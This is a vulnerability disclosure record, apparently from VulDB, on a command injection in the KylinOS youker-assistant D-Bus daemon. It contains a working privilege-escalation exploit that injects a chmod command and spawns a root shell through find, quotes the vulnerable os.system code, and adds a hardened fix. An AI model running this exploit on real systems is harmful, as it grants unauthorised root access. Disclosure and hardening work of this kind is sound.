| Field | Value |
|---|---|
| Title | Kylin OS youker-assistant privilege escalation vulnerability |
| Description | (the submitted report is reproduced below) |

Kylin OS youker-assistant privilege escalation vulnerability
Author: Set3r.Pan ([email protected])
Unit: KylinSoft (https://www.kylinos.cn/)
Report

Description

Youker-assistant is an integrated tool on the KylinOS desktop that helps perform daily system maintenance tasks. Its system daemon contains a command injection vulnerability that lets an ordinary (unprivileged) user escalate privileges.
Hazard level: High

Affected version: Desktop: youker-assistant < x.x.x.x
PoC & Exploit

ISO download:
https://distro-images.kylinos.cn:8802/web_pungi/download/share/HXDYtGjZm3daA4UvOTLkiPl1nB9ErM0c/

exploit.py:

```python
import os
import time
import dbus

# Talk to the youker-assistant system daemon over the D-Bus system bus
bus = dbus.SystemBus()
interface = dbus.Interface(bus.get_object('com.kylin.assistant.systemdaemon',
                                          '/com/kylin/assistant/systemdaemon'),
                           'com.kylin.assistant.systemdaemon')
# The argument is interpolated unescaped into a shell command by the daemon
interface.adjust_cpufreq_scaling_governer("123|chmod 4777 /usr/bin/find|")
time.sleep(3)
os.system('find /tmp -exec /bin/sh -p \\;')
```
Vulnerability details

Vulnerable function: adjust_cpufreq_scaling_governer

Vulnerability type: Command Injection

Vulnerable code:

```python
else:
    cmd = 'echo %s > %s' % (value, filepath)
    os.system(cmd)
```

The `value` in the command executed by `os.system` comes directly from the D-Bus caller's input, so shell metacharacters in it are interpreted by the shell and arbitrary commands can be injected.
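As an added example that is not part of the report or of the youker-assistant code base, the following shows the hardened form of the vulnerable branch: the governor name is checked against an allowlist of plain identifiers and written to the target file directly, so no shell command is built at all. The allowlist contents, the temporary-file stand-in for the sysfs node, and the sysfs path mentioned in the comments are assumptions made for this example.

```python
import os
import re
import tempfile

# Constructed allowlist for this example. A real fix should read the kernel's
# own list from /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
# (assumed sysfs path) and accept only the names found there.
ALLOWED_GOVERNORS = frozenset(
    {"performance", "powersave", "ondemand", "conservative", "schedutil", "userspace"}
)

# Governor names consist of lowercase letters and underscores only; anything
# else (spaces, '|', ';', '$', newlines, ...) is rejected before it is used.
_GOVERNOR_RE = re.compile(r"[a-z_]{1,32}")


def unsafe_command_string(value, filepath):
    """Builds the same string the vulnerable code hands to os.system(), without
    executing it, so the effect of shell metacharacters can be inspected."""
    return 'echo %s > %s' % (value, filepath)


def validate_governor(value):
    """Returns the governor name if it is syntactically clean and on the
    allowlist; raises ValueError otherwise."""
    if not isinstance(value, str):
        raise ValueError("governor must be a string")
    if not _GOVERNOR_RE.fullmatch(value):
        raise ValueError("governor contains characters outside [a-z_]")
    if value not in ALLOWED_GOVERNORS:
        raise ValueError("governor %r is not in the allowlist" % value)
    return value


def is_safe_governor(value):
    """Boolean convenience wrapper around validate_governor()."""
    try:
        validate_governor(value)
        return True
    except ValueError:
        return False


def write_governor(value, filepath):
    """Hardened replacement for the vulnerable branch: validates the value and
    writes it with a plain file write, so no shell is ever involved."""
    governor = validate_governor(value)
    with open(filepath, "w") as fh:
        fh.write(governor + "\n")
    return governor


def demo_write_governor(value):
    """Stand-in for the sysfs file: writes to a temporary file (constructed for
    the example, not a real cpufreq node) and returns what was written."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        write_governor(value, path)
        with open(path) as fh:
            return fh.read().strip()
    finally:
        os.unlink(path)


if __name__ == "__main__":
    # The vulnerable string form: a ';' in the argument becomes a second command
    print(unsafe_command_string("ondemand; id", "/tmp/governor"))
    print(demo_write_governor("ondemand"))   # ondemand
    print(is_safe_governor("ondemand; id"))  # False
```

Validating the argument inside the daemon is the necessary part of the fix, because the D-Bus method is reachable by any local user of the system bus; the method should additionally be gated by an authorization check (for example polkit) so that unprivileged callers cannot change the governor at all.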
| Field | Value |
|---|---|
| Source | https://github.com/i900008/vulndb/blob/main/youker-assistant_vuln.md |
| User | Set3r.Pan (UID 28571) |
| Submission | 11/04/2023 03:26 AM (3 years ago) |
| Moderation | 15/04/2023 10:40 AM (4 days later) |
| Status | Approved |
| VulDB Entry | 226099 [KylinSoft youker-assistant before 3.1.4.13 on KylinOS adjust_cpufreq_scaling_governer privilege escalation] |
| Points | 20 |